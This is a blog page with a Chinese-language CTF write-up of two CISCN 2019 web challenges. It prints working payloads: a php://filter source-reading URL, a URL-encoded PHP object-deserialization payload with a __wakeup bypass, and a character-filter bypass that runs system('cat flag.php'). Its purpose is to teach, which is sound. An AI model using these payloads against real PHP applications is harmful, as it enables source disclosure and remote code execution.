<!DOCTYPE HTML>
<html lang="">


<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta name="keywords" content="CISCN web writeup, GAP&#39;s blog">
    <meta name="description" content="记录一下萌新的第一次CISCN之旅，这次和队友一起完成了两道web题目(虽然第二题没有什么输出),这次的web题目质量很高，接下来是我对这次比赛解题过程的记录~
web1访问index.php,可以看到如下界面右键查看页面源代码得到了两个提">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>CISCN web writeup | GAP&#39;s blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/font-awesome.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">
    <style type="text/css">
        
    </style>

    <script src="/libs/jquery/jquery-2.2.0.min.js"></script>
</head>


<body>

<header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">GAP's blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fa fa-navicon"></i></a>
<ul class="right">
    
    <li class="hide-on-med-and-down">
        <a href="/" class="waves-effect waves-light">
            
            <i class="fa fa-home"></i>
            
            <span>Index</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/tags" class="waves-effect waves-light">
            
            <i class="fa fa-tags"></i>
            
            <span>Tags</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/categories" class="waves-effect waves-light">
            
            <i class="fa fa-bookmark"></i>
            
            <span>Categories</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/archives" class="waves-effect waves-light">
            
            <i class="fa fa-archive"></i>
            
            <span>Archives</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/about" class="waves-effect waves-light">
            
            <i class="fa fa-user-circle-o"></i>
            
            <span>About</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/friends" class="waves-effect waves-light">
            
            <i class="fa fa-address-book"></i>
            
            <span>Friends</span>
        </a>
    </li>
    
    <li>
        <a href="#searchModal" class="modal-trigger waves-effect waves-light">
            <i id="searchIcon" class="fa fa-search" title="Search"></i>
        </a>
    </li>
</ul>

<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">GAP's blog</div>
        <div class="logo-desc">
            
            Welcome~
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li>
            <a href="/" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-home"></i>
                
                Index
            </a>
        </li>
        
        <li>
            <a href="/tags" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-tags"></i>
                
                Tags
            </a>
        </li>
        
        <li>
            <a href="/categories" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-bookmark"></i>
                
                Categories
            </a>
        </li>
        
        <li>
            <a href="/archives" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-archive"></i>
                
                Archives
            </a>
        </li>
        
        <li>
            <a href="/about" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-user-circle-o"></i>
                
                About
            </a>
        </li>
        
        <li>
            <a href="/friends" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-address-book"></i>
                
                Friends
            </a>
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fa fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>

        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank" data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewbox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"/>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"/>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"/>
    </svg>
</a>
        
    </nav>

</header>





<div class="bg-cover pd-header post-cover" style="background-image: url('/img/8.png')">
    <div class="container">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <div class="description center-align post-title">
                        CISCN web writeup
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>



<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 20px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/ctf/" target="_blank">
                                <span class="chip bg-color">ctf</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                <div class="post-date info-break-policy">
                    <i class="fa fa-calendar-minus-o fa-fw"></i>Publish Date:&nbsp;&nbsp;
                    2019-04-25
                </div>

                
				
				
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="fa fa-eye fa-fw"></i>Read Count:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <p>记录一下萌新的第一次CISCN之旅，这次和队友一起完成了两道web题目(虽然第二题没有什么输出),这次的web题目质量很高，接下来是我对这次比赛解题过程的记录~</p>
<h2 id="web1"><a href="#web1" class="headerlink" title="web1"></a>web1</h2><p>访问<code>index.php</code>,可以看到如下界面<br><img src="/2019/04/25/CISCN2019 web writeup/1.png" alt="在这里插入图片描述"><br>右键查看页面源代码<br><img src="/2019/04/25/CISCN2019 web writeup/2.png" alt="在这里插入图片描述"><br>得到了两个提示<br>1.<code>index.php</code>中可能存在有文件包含的漏洞<br>2.<code>hint.php</code>存在有提示<br>首先利用<code>php://filter</code>访问<code>hint.php</code>，修改url为<code>http://127.0.0.1/ciscnweb1/index.php?file=php://filter/read=convert.base64-encode/resource=hint.php</code>，base64解密后得到<code>hint.php</code>的网页源码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php  </span><br><span class="line">class Handle&#123; </span><br><span class="line">    private $handle;  </span><br><span class="line">    public function __wakeup()&#123;</span><br><span class="line">		foreach(get_object_vars($this) as $k =&gt; $v) &#123;</span><br><span class="line">            $this-&gt;$k = null;</span><br><span class="line">        &#125;</span><br><span class="line">        echo &quot;Waking up\n&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">	public function __construct($handle) &#123; </span><br><span class="line">        $this-&gt;handle = $handle; </span><br><span class="line">    &#125; </span><br><span class="line">	public function __destruct()&#123;</span><br><span class="line">		$this-&gt;handle-&gt;getFlag();</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class Flag&#123;</span><br><span class="line">    public $file;</span><br><span class="line">    public $token;</span><br><span class="line">    public $token_flag;</span><br><span class="line"> </span><br><span class="line">    function __construct($file)&#123;</span><br><span class="line">		$this-&gt;file = $file;</span><br><span class="line">		$this-&gt;token_flag = $this-&gt;token = md5(rand(1,10000));</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">	public function getFlag()&#123;</span><br><span class="line">		$this-&gt;token_flag = md5(rand(1,10000));</span><br><span class="line">        if($this-&gt;token === $this-&gt;token_flag)</span><br><span class="line">		&#123;</span><br><span class="line">			if(isset($this-&gt;file))&#123;</span><br><span class="line">				echo @highlight_file($this-&gt;file,true); </span><br><span class="line">            &#125;  </span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>同理我们也可以获得<code>index.php</code>的网页源码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">error_reporting(0); </span><br><span class="line">$file = $_GET[&quot;file&quot;]; </span><br><span class="line">$payload = $_GET[&quot;payload&quot;];</span><br><span class="line">if(!isset($file))&#123;</span><br><span class="line">	echo &apos;Missing parameter&apos;.&apos;&lt;br&gt;&apos;;</span><br><span class="line">&#125;</span><br><span class="line">if(preg_match(&quot;/flag/&quot;,$file))&#123;</span><br><span class="line">	die(&apos;hack attacked!!!&apos;);</span><br><span class="line">&#125;</span><br><span class="line">@include($file);</span><br><span class="line">if(isset($payload))&#123;  </span><br><span class="line">    $url = parse_url($_SERVER[&apos;REQUEST_URI&apos;]);</span><br><span class="line">    parse_str($url[&apos;query&apos;],$query);</span><br><span class="line">    foreach($query as $value)&#123;</span><br><span class="line">        if (preg_match(&quot;/flag/&quot;,$value)) &#123; </span><br><span class="line">    	    die(&apos;stop hacking!&apos;);</span><br><span class="line">    	    exit();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    $payload = base64_decode($payload);</span><br><span class="line">    $payload = unserialize($payload);</span><br><span class="line">&#125;else&#123; </span><br><span class="line">   echo &quot;Missing parameters&quot;; </span><br><span class="line">&#125; </span><br><span class="line">?&gt;</span><br><span class="line">&lt;!--Please test index.php?file=xxx.php --&gt;</span><br><span class="line">&lt;!--Please get the source of hint.php--&gt;</span><br></pre></td></tr></table></figure>
<p>接下来我们对代码进行逐行分析，首先是<code>hint.php</code>中的内容<br><img src="/2019/04/25/CISCN2019 web writeup/3.png" alt="在这里插入图片描述"><br>定义了一个名为<code>Handle</code>的类，其调用了<code>function __wakeup</code>函数，其会在我们对<code>Handle</code>类的对象进行反序列化的时候进行调用，结合下面的语句，我们需要绕过<code>function __wakeup</code>来避免我们传入的内容被置换为<code>null</code>，联想到MOCTF中一道名为PUBG的题目，可以通过修改序列化语句中的类属性数量对其进行绕过。然后就可以实现在对其析构时调用转入<code>handle</code>的<code>getFlag()</code>函数。<br><img src="/2019/04/25/CISCN2019 web writeup/4.png" alt="在这里插入图片描述"><br>定义了一个名为<code>Flag</code>的类，内部有三个变量，分别名为<code>file</code>,<code>token</code>和<code>token_flag</code>。在构造的时候后面两个变量被同时赋值为了(1,10000)当中任意一个数字的md5值，也就是说此时<code>token_flag</code>和<code>token</code>的值相同。<br>接下来时<code>getFlag()</code>函数，在调用这个函数的时候我们的<code>token_flag</code>的值有一次被赋值为了1,10000)当中任意一个数字的md5值，此时当且仅当<code>token</code>和<code>token_flag</code>的值完全相同时，file的内容才会被读取。<br>此时要想做到<code>token_flag</code>和<code>token</code>的值完全相同依靠随机事件的发生(两次rand得到的随机数相同)是不实际的，此时联想到去年安恒月赛当中一道构造pop链的题目，其中也涉及了两个变量相等后其中一个变量发生了改变，需要实现两个变量相同的考察点，我们也如法炮制，采用动态跟随的方式进行绕过，即构造<code>$token=&amp;$token_flag</code>进行绕过。<br>接下来就是把上面的点进行整合，构造出符合要求的<code>Handle</code>类<br><img src="/2019/04/25/CISCN2019 web writeup/5.png" alt="在这里插入图片描述"><br><img src="/2019/04/25/CISCN2019 web writeup/6.png" alt="在这里插入图片描述"><br>接着就是这道题目最大的坑点了，就是如果以这种方式生成的类是不会显示<code>Handle</code>两侧的不可见字符的！下图是我在php在线工具当中进行的测试<br><img src="/2019/04/25/CISCN2019 web writeup/7.png" alt="在这里插入图片描述"><br>因此我们采取url编码的方式将不可见字符变为可识别的内容<br><img src="/2019/04/25/CISCN2019 web writeup/8.png" alt="在这里插入图片描述"><br>至此我们对于类和反序列化的操作就告一段落了。<br>然后我们查看<code>index.php</code>当中对于我们输入的过滤操作。<br><img src="/2019/04/25/CISCN2019 web writeup/9.png" alt="在这里插入图片描述"><br>首先是<code>$file</code>不能出现<code>flag</code><br><img src="/2019/04/25/CISCN2019 web writeup/10.png" alt="在这里插入图片描述"><br>接着是<code>$payload</code>,首先我们的url被<code>parse_url</code>解析到数组当中，其中的<code>query</code>便是我们我们get方式传入的内容，<code>parse_str</code>会把查询字符串解析到变量当中。这也就要求我们传入的变量的值也不得出现<code>flag</code>，但毫无疑问我们要查询的内容就是<code>flag.php</code>,查到了一篇文章对<code>parse_url</code>进行绕过。</p>
<blockquote>
<p><a href="http://www.am0s.com/functions/406.html" target="_blank" rel="noopener">http://www.am0s.com/functions/406.html</a></p>
</blockquote>
<p><img src="/2019/04/25/CISCN2019 web writeup/11.png" alt="在这里插入图片描述"><br>现在可以尝试读取<code>flag.php</code>了<br>最终的payload:<code>http://127.0.0.1///ciscnweb1/index.php?file=hint.php&amp;payload=O%3A6%3A%22Handle%22%3A1%3A{s%3A14%3A%22%00Handle%00handle%22%3BO%3A4%3A%22Flag%22%3A3%3A{s%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3Bs%3A5%3A%22token%22%3Bs%3A32%3A%22ca9c267dad0305d1a6308d2a0cf1c39c%22%3Bs%3A10%3A%22token_flag%22%3BR%3A4%3B}}</code></p>
<h2 id="WEB3"><a href="#WEB3" class="headerlink" title="WEB3"></a>WEB3</h2><p>这道题目很有意思，得到flag的思路也很清晰，查看<code>calc.php</code>便得到了网页的源码，</p>
<p>可以看到最后的关键语句<br><img src="/2019/04/25/CISCN2019 web writeup/12.png" alt="在这里插入图片描述"><br>只需要我们构造出<code>$content</code>的内容为system(cat flag.php)就好了，话虽如此，构造的过程我们也是绕了很多很多的弯路。<img src="/2019/04/25/CISCN2019 web writeup/13.png" alt="在这里插入图片描述"><br>首先是我们输入的长度收到了限制不得超过80位。<br>接着是blacklist的中的内容，禁用了空格，换行符，单双引号，反引号，中括号。<br>之后便是过滤了所有的字符(包括大小写字母下划线)。<br>开始时我们的想法是<br>1.利用通配符进行绕过<br>2.利用异或进行构造<br>但是这两种方法很快都被否决了，首先是通配符绕过，由于没有反引号无法执行指令；接着是异或构造由于没有单引号也无法实现。<br>最后我们注意到了<code>$whitelist</code>的中的内容，尝试利用其中的函数进行构造(当然是我给力的队友想出来的~)<br>payload:<code>$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{0}($$pi{1})&amp;0=system&amp;1=cat flag.php</code><br>解释一下，首先是<code>base_convert</code>函数完成了36进制到10进制的转换，即<code>$pi=hex2bin(dechex(1598506324))</code>,<code>dechex(1598506324)</code>实现了10进制转换为16进制，即<code>$pi=hex2bin(5f474554)</code>，<code>hex2bin(5f474554)</code><br>实现了16进制转为10进制，最后构造出了<code>$pi=_GET()</code><br>实现了get的构造后一切就变得清晰了<code>$${0}</code>就变成了<code>$_GET(0)</code>,同理<code>$_GET(1)</code>也被构造了出来。<code>$$pi{0}($$pi{1})</code>就变成了<code>$_GET(0)($GET(1))</code>，接着我们传入0为system,1为cat flag.php，绕过了字符限制，完成getshell。</p>

            </div>
            <hr>

            

            <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">

<div id="article-share">
    
    <div class="social-share" data-disabled="qzone, qq, weibo, douban"></div>
    
</div>

<script src="/libs/share/js/social-share.min.js"></script>

            <div class="reprint">
                <p>
                    <span class="reprint-tip">
                        <i class="fa fa-exclamation-circle"></i>&nbsp;&nbsp;Reprint please specify:
                    </span>
                    <a href="http://yoursite.com" class="b-link-green">GAP's blog</a>
                    <i class="fa fa-angle-right fa-lg fa-fw text-color"></i>
                    <a href="/2019/04/25/CISCN2019 web writeup/" class="b-link-green">CISCN web writeup</a>
                </p>
            </div>
        </div>
    </div>

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6 overflow-policy" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fa fa-dot-circle-o"></i>&nbsp;Current
            </div>
            <div class="card">
                <a href="/2019/04/25/CISCN2019 web writeup/">
                    <div class="card-image">
                        
                        <img src="/img/8.png" class="responsive-img" alt="CISCN web writeup">
                        
                        <span class="card-title">CISCN web writeup</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">记录一下萌新的第一次CISCN之旅，这次和队友一起完成了两道web题目(虽然第二题没有什么输出),这次的web题目质量很高，接下来是我对这次比赛解题过程的记录~
web1访问index.php,可以看到如下界面右键查看页面源代码得到了两个提</div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="fa fa-clock-o fa-fw icon-date"></i>2019-04-25
                            </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-user fa-fw"></i>
                            GAP
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/ctf/" target="_blank">
                        <span class="chip bg-color">ctf</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6 overflow-policy" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                Next&nbsp;<i class="fa fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2019/04/03/Jarvis OJ web writeup/">
                    <div class="card-image">
                        
                        <img src="/img/6.jpg" class="responsive-img" alt="Jarvis OJ web writeup">
                        
                        <span class="card-title">Jarvis OJ web writeup</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">1. Login在响应头中得到了hint也就是说我们post传入的pass经过了md5加密，我们都知道这种登陆问题最常见的payload就是类似于admin&#39;or 1=1#这种，同理我们只要能找到一个md5加密后符合这种类似格式的语</div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="fa fa-clock-o fa-fw icon-date"></i>2019-04-03
                            </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-user fa-fw"></i>
                            GAP
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/ctf/" target="_blank">
                        <span class="chip bg-color">ctf</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>
</div>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="fa fa-list-alt"></i>&nbsp;&nbsp;TOC</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fa fa-list"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            // headingsOffset: -205,
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).slideUp(500);
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).slideDown(500);
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>
    

</main>


<footer class="page-footer bg-color">
    <div class="container row center-align">
        <div class="col s12 m8 l8 copy-right">
            本站由&copy;<a href="https://blinkfox.github.io/" target="_blank">Blinkfox</a>基于
            <a href="https://hexo.io/" target="_blank">Hexo</a> 的
            <a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">hexo-theme-matery</a>主题搭建.

            

            
			
                <br>
                
                <span id="busuanzi_container_site_pv">
                    <i class="fa fa-heart-o"></i>
                    本站总访问量 <span id="busuanzi_value_site_pv" class="white-color"></span>
                </span>
                
                
                <span id="busuanzi_container_site_uv">
                    <i class="fa fa-users"></i>
                    次,&nbsp;访客数 <span id="busuanzi_value_site_uv" class="white-color"></span> 人.
                </span>
                
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/njupt-gap/njupt-gap.github.io" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fa fa-github"></i>
    </a>



    <a href="mailto:1528652674@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fa fa-envelope-open"></i>
    </a>



    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1528652674" class="tooltipped" data-tooltip="QQ联系我: 1528652674" data-position="top" data-delay="50">
        <i class="fa fa-qq"></i>
    </a>


</div>
    </div>
</footer>

<div class="progress-bar"></div>


<!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fa fa-search"></i>&nbsp;&nbsp;Search</span>
            <input type="search" id="searchInput" name="s" placeholder="Please enter a search keyword" class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
});
</script>
<!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fa fa-angle-up"></i>
    </a>
</div>


<script src="/libs/materialize/materialize.min.js"></script>
<script src="/libs/masonry/masonry.pkgd.min.js"></script>
<script src="/libs/aos/aos.js"></script>
<script src="/libs/scrollprogress/scrollProgress.min.js"></script>
<script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
<script src="/js/matery.js"></script>

<!-- Global site tag (gtag.js) - Google Analytics -->



    <script src="/libs/others/clicklove.js"></script>


    <script async src="/libs/others/busuanzi.pure.mini.js"></script>


</body>
</html>